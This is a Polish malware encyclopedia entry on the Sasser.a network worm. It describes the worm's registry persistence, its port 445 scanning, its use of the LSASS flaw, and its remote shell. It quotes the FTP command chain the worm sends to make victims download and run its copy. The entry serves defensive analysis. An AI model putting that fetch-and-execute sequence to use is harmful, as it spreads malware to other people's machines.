Home → Encyklopedia → Robaki → Net-Worm.Win32.Sasser.a
Oznaki infekcji
O zainfekowaniu komputera robakiem Sasser.a mogą świadczyć następujące symptomy:
Rozprzestrzenianie
Po uruchomieniu robak tworzy w folderze Windows plik avserve.exe oraz klucz auto-run w rejestrze systemowym:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%Folder Windows%\avserve.exe"
W celu oznaczenia zainfekowanych komputerów Sasser.a tworzy w pamięci RAM unikatowy identyfikator Jobaka31.
Szkodnik uruchamia serwer FTP na porcie TCP 5554, po czym aktywuje 128 procedur rozprzestrzeniających. W tym samym czasie robak podejmuje próbę zainicjowania procesu AbortSystemShutdown, który powoduje ponowne uruchomienie komputera.
W celu zidentyfikowania potencjalnych ofiar Sasser.a skanuje adresy IP i wysyła żądania na port TCP 445. Jeżeli zdalny komputer zezwoli na połączenie, robak instaluje tam (korzystając z luki w zabezpieczeniach LSASS) interpreter poleceń cmd.exe na porcie TCP 9996. Na koniec robak przesyła polecenia, które pobierają go i uruchamiają na atakowanej maszynie. Kopia szkodnika pobierana jest z nazwą N_up.exe, gdzie "N" jest losowym numerem. Oto komendy wysyłane przez Sassera:
echo off echo open [adres atakowanego komputera] 5554>>cmd.ftp echo anonymous>>cmd.ftp echo user echo bin>>cmd.ftp echo get [losowy numer]_up.exe>>cmd.ftp echo bye>>cmd.ftp echo on ftp -s:cmd.ftp [losowy numer]_up.exe echo off del cmd.ftp echo on
W rezultacie na atakowanym komputerze pojawiają się kopie Sassera posiadające (przykładowo) nazwy 23101_up.exe, 5409_up.exe itd.
Informacje dodatkowe
Po zakończeniu ataku zainfekowany komputer generuje komunikat o wystąpieniu błędu w usłudze LSASS, po czym może nastąpić restart komputera.
Sasser.a tworzy w folderze głównym dysku C plik win.log i zapisuje w nim adresy IP wszystkich zainfekowanych komputerów.
Analizy
Blog